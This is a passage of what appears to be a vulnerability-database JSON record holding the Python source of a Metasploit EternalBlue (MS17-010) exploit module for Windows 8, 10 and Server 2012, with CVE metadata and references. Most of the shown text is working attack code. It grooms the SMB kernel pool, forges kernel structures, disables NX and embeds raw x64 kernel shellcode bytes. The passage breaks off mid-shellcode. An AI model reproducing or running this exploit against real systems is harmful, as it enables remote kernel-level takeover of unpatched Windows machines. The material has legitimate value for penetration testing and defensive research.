ntfea9000\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\n # stop copying by invalid flag (can be any value except 0 and 0x80)\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\n return feaList\n\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\n# x64: fake struct is at ffffffff ffd00e00\n# offset 0x50: KSPIN_LOCK\n# offset 0x58: LIST_ENTRY must be valid address. 
cannot be NULL.\n# offset 0x110: array of pointer to function\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\n# some useful offset\n# offset 0x120: arg1 when invoking ptr to function\n# offset 0x128: arg2 when invoking ptr to function\n#\n# code path to get code exection after this struct is controlled\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\nfake_recv_struct = ('\\x00'*16)*5\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\nfake_recv_struct += ('\\x00'*16)*10\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\nfake_recv_struct += ('\\x00'*16)*3\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address\n\n\ndef getNTStatus(self):\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\nif not dependencies_missing:\n setattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\n\ndef sendEcho(conn, tid, data):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\n transCommand['Data'] = smb.SMBEcho_Data()\n\n transCommand['Parameters']['EchoCount'] = 1\n transCommand['Data']['Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('got good ECHO response')\n else:\n module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n\n\n# override SMB.neg_session() to allow forcing ntlm authentication\nif not dependencies_missing:\n class MYSMB(smb.SMB):\n def __init__(self, remote_host, port, use_ntlmv2=True):\n self.__use_ntlmv2 
= use_ntlmv2\n smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)\n\n def neg_session(self, extended_security = True, negPacket = None):\n smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)\n\ndef createSessionAllocNonPaged(target, port, size, username, password):\n conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set\n _, flags2 = conn.get_flags()\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\n if size >= 0xffff:\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n else:\n flags2 |= smb.SMB.FLAGS2_UNICODE\n reqSize = size\n conn.set_flags(flags2=flags2)\n\n pkt = smb.NewSMBPacket()\n\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\n sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()\n\n sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\n sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero\n sessionSetup['Parameters']['SessionKey'] = 0\n sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 
0 for NULL session\n sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS\n\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n if username:\n # Try login with valid user because anonymous user might get access denied on Windows Server 2012.\n # Note: If target allows only NTLMv2 authentication, the login will always fail.\n # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n conn.set_flags(flags2=flags2)\n\n # new SMB packet to reset flags\n pkt = smb.NewSMBPacket()\n pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))\n # UnicodePasswordLen field is in Reserved for extended security format.\n sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)\n sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\\x00'*16\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n # lazy to check error code, just print fail message\n module.log('SMB1 session setup allocate nonpaged pool failed', 'error')\n sys.exit(1)\n\n\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\nif not dependencies_missing:\n class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\n structure = (\n ('TotalParameterCount', '<H=0'),\n ('TotalDataCount', '<H'),\n ('ParameterCount', '<H=0'),\n ('ParameterOffset', '<H=0'),\n ('ParameterDisplacement', '<H=0'),\n ('DataCount', '<H'),\n ('DataOffset', '<H'),\n ('DataDisplacement', '<H=0'),\n 
('FID', '<H=0'),\n )\n\ndef send_trans2_second(conn, tid, data, displacement):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n # assume no params\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\n\n transCommand['Parameters']['TotalParameterCount'] = 0\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+18\n transCommand['Data']['Pad1'] = ''\n\n transCommand['Parameters']['ParameterCount'] = 0\n transCommand['Parameters']['ParameterOffset'] = 0\n\n if len(data) > 0:\n pad2Len = (4 - fixedOffset % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = len(data)\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\n transCommand['Parameters']['DataDisplacement'] = displacement\n\n transCommand['Data']['Trans_Parameters'] = ''\n transCommand['Data']['Trans_Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n\n\ndef send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n command = pack('<H', setup)\n\n # Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\n transCommand['Parameters']['MaxSetupCount'] = 1\n transCommand['Parameters']['MaxParameterCount'] = len(param)\n transCommand['Parameters']['MaxDataCount'] = 0\n transCommand['Data'] = smb.SMBTransaction2_Data()\n\n transCommand['Parameters']['Setup'] = command\n transCommand['Parameters']['TotalParameterCount'] = len(param)\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+38 + len(command)\n if len(param) > 0:\n padLen 
= (4 - fixedOffset % 4 ) % 4\n padBytes = '\\xFF' * padLen\n transCommand['Data']['Pad1'] = padBytes\n else:\n transCommand['Data']['Pad1'] = ''\n padLen = 0\n\n transCommand['Parameters']['ParameterCount'] = len(param)\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\n\n if len(data) > 0:\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\n\n transCommand['Data']['Trans_Parameters'] = param\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB() # must be success\n if recvPkt.getNTStatus() == 0:\n module.log('got good NT Trans response')\n else:\n module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n sys.exit(1)\n\n # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data\n i = firstDataFragmentSize\n while i < len(data):\n sendSize = min(4096, len(data) - i)\n if len(data) - i <= 4096:\n if not sendLastChunk:\n break\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\n i += sendSize\n\n if sendLastChunk:\n conn.recvSMB()\n return i\n\n\n# connect to target and send a large nbss size with data 0x80 bytes\n# this method is for allocating big nonpaged pool on target\ndef createConnectionWithBigSMBFirst80(target, port, for_nx=False):\n sk = socket.create_connection((target, port))\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\n # Also this is invalid SMB2 message.\n # I believe NSA exploit use SMB2 for hiding alert from IDS\n #pkt += '\\xfeSMB' # smb2\n # it can be anything even it is invalid\n pkt += 'BAAD' # can be any\n if 
for_nx:\n # MUST set no delay because 1 byte MUST be sent immediately\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\n else:\n pkt += '\\x00'*0x7c\n sk.send(pkt)\n return sk\n\n\ndef _exploit(target, port, feaList, shellcode, numGroomConn, username, password):\n # force using smb.SMB for SMB1\n conn = smb.SMB(target, target, sess_port = port)\n conn.login(username, password)\n server_os = conn.get_server_os()\n module.log('Target OS: '+server_os)\n if server_os.startswith(\"Windows 10 \"):\n build = int(server_os.split()[-1])\n if build >= 14393: # version 1607\n module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')\n sys.exit(1)\n elif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\n module.log('This exploit does not support this target: {}'.format(server_os), 'error')\n sys.exit(1)\n\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n\n # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.\n # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment\n progress = send_big_trans2(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\n\n # Another TRANS2_OPEN2 (0) with special feaList for disabling NX\n nxconn = smb.SMB(target, target, sess_port = port)\n nxconn.login(username, password)\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\n\n # create some big buffer at server\n # this buffer MUST NOT be big enough for overflown buffer\n allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)\n\n # groom nonpaged pool\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\n srvnetConn = []\n 
for i in range(numGroomConn):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # create buffer size NTFEA_SIZE at server\n # this buffer will be replaced by overflown buffer\n holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)\n # disconnect allocConn to free buffer\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\n allocConn.get_socket().close()\n\n # hope one of srvnetConn is next to holeConn\n for i in range(5):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # remove holeConn to create hole for fea buffer\n holeConn.get_socket().close()\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # first trigger, overwrite srvnet buffer struct for disabling NX\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\n recvPkt = nxconn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status for nx: INVALID_PARAMETER')\n else:\n module.log('bad response status for nx: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # send '\\x00' to disable nx\n for sk in srvnetConn:\n sk.send('\\x00')\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # second trigger, place fake struct and shellcode\n send_trans2_second(conn, tid, feaList[progress:], progress)\n recvPkt = conn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status: INVALID_PARAMETER')\n else:\n module.log('bad response status: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # a corrupted buffer will write recv data in designed memory address\n for sk in srvnetConn:\n sk.send(fake_recv_struct + shellcode)\n\n # execute 
shellcode\n for sk in srvnetConn:\n sk.close()\n\n # nicely close connection (no need for exploit)\n nxconn.disconnect_tree(tid)\n nxconn.logoff()\n nxconn.get_socket().close()\n conn.disconnect_tree(tid)\n conn.logoff()\n conn.get_socket().close()\n\n\ndef exploit(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket) missing, cannot continue', 'error')\n sys.exit(1)\n\n # XXX: Normalize strings to ints and unset options to empty strings\n rport = int(args['RPORT'])\n numGroomConn = int(args['GroomAllocations'])\n smbuser = args['SMBUser'] if 'SMBUser' in args else ''\n smbpass = args['SMBPass'] if 'SMBPass' in args else ''\n\n # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload\n sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])\n\n if len(sc) > 0xe80:\n module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')\n sys.exit(1)\n\n # Now, shellcode is known. 
create a feaList\n feaList = createFeaList(len(sc))\n\n module.log('shellcode size: {:d}'.format(len(sc)))\n module.log('numGroomConn: {:d}'.format(numGroomConn))\n\n try:\n _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)\n # XXX: Catch everything until we know better\n except Exception as e:\n module.log(str(e), 'error')\n sys.exit(1)\n\n module.log('done')\n\n\nif __name__ == '__main__':\n module.run(metadata, exploit)\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 49}, "differentElements": ["published", "modified"], "edition": 40, "lastseen": "2020-01-08T17:48:55"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. 
Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-01-12T02:00:54", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", 
"MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-01-12T02:00:54", "value": 7.7, "vector": "NONE"}}, "hash": "e2220776e8cde746959dfd4abe7c3c98", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-01-12T02:00:54", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "#!/usr/bin/env python\n\nimport sys\nimport socket\nfrom struct import pack\nfrom base64 import b64decode\n\ntry:\n from impacket import smb, ntlm\nexcept ImportError:\n dependencies_missing = True\nelse:\n dependencies_missing = False\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+',\n 'description': '''\n EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. 
Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution\n ''',\n 'authors': [\n 'Equation Group', # OG research and exploit\n 'Shadow Brokers', # Hack and dump\n 'sleepya', # Research and PoC\n 'wvu' # Babby's first external module\n ],\n 'references': [\n {'type': 'msb', 'ref': 'MS17-010'},\n {'type': 'cve', 'ref': '2017-0143'},\n {'type': 'cve', 'ref': '2017-0144'},\n {'type': 'cve', 'ref': '2017-0145'},\n {'type': 'cve', 'ref': '2017-0146'},\n {'type': 'cve', 'ref': '2017-0147'},\n {'type': 'cve', 'ref': '2017-0148'},\n {'type': 'edb', 'ref': '42030'},\n {'type': 'url', 'ref': 'https://github.com/worawit/MS17-010'}\n ],\n 'date': 'Mar 14 2017',\n 'type': 'remote_exploit',\n 'rank': 'average',\n 'privileged': True,\n 'wfsdelay': 5,\n 'targets': [\n {'platform': 'win', 'arch': 'x64'}\n ],\n 'options': {\n 'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},\n 'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},\n 'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'}, \n 'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': 
True, 'default': 13},\n # if anonymous can access any share folder, 'IPC$' is always accessible.\n # authenticated user is always able to access 'IPC$'.\n # Windows 2012 does not allow anonymous to login if no share is accessible.\n 'SMBUser': {'type': 'string', 'description': '(Optional) The username to authenticate as', 'required': False, 'default': ''},\n 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''}\n },\n 'notes': {\n 'AKA': ['ETERNALBLUE']\n }\n}\n\n\n\ndef hash(process): \n # calc_hash from eternalblue_kshellcode_x64.asm \n proc_hash = 0\n for c in str( process + \"\\x00\" ):\n proc_hash = ror( proc_hash, 13 )\n proc_hash += ord( c )\n return pack('<I', proc_hash)\n\ndef ror( dword, bits ):\n return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF\n\n# git clone https://github.com/worawit/MS17-010\n# cd MS17-010/shellcode\n# nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin\ndef eternalblue_kshellcode_x64(process=\"spoolsv.exe\"):\n proc_hash = hash(process)\n return (\n '\\x55\\xe8\\x2e\\x00\\x00\\x00\\xb9\\x82\\x00\\x00\\xc0\\x0f\\x32\\x4c\\x8d'\n '\\x0d\\x34\\x00\\x00\\x00\\x44\\x39\\xc8\\x74\\x19\\x39\\x45\\x00\\x74\\x0a'\n '\\x89\\x55\\x04\\x89\\x45\\x00\\xc6\\x45\\xf8\\x00\\x49\\x91\\x50\\x5a\\x48'\n '\\xc1\\xea\\x20\\x0f\\x30\\x5d\\xc3\\x48\\x8d\\x2d\\x00\\x10\\x00\\x00\\x48'\n '\\xc1\\xed\\x0c\\x48\\xc1\\xe5\\x0c\\x48\\x83\\xed\\x70\\xc3\\x0f\\x01\\xf8'\n '\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8b\\x24\\x25\\xa8'\n '\\x01\\x00\\x00\\x6a\\x2b\\x65\\xff\\x34\\x25\\x10\\x00\\x00\\x00\\x50\\x50'\n '\\x55\\xe8\\xc5\\xff\\xff\\xff\\x48\\x8b\\x45\\x00\\x48\\x83\\xc0\\x1f\\x48'\n '\\x89\\x44\\x24\\x10\\x51\\x52\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x31'\n '\\xc0\\xb2\\x01\\xf0\\x0f\\xb0\\x55\\xf8\\x75\\x14\\xb9\\x82\\x00\\x00\\xc0'\n '\\x8b\\x45\\x00\\x8b\\x55\\x04\\x0f\\x30\\xfb\\xe8\\x0e\\x00\\x00\\x00\\xfa'\n 
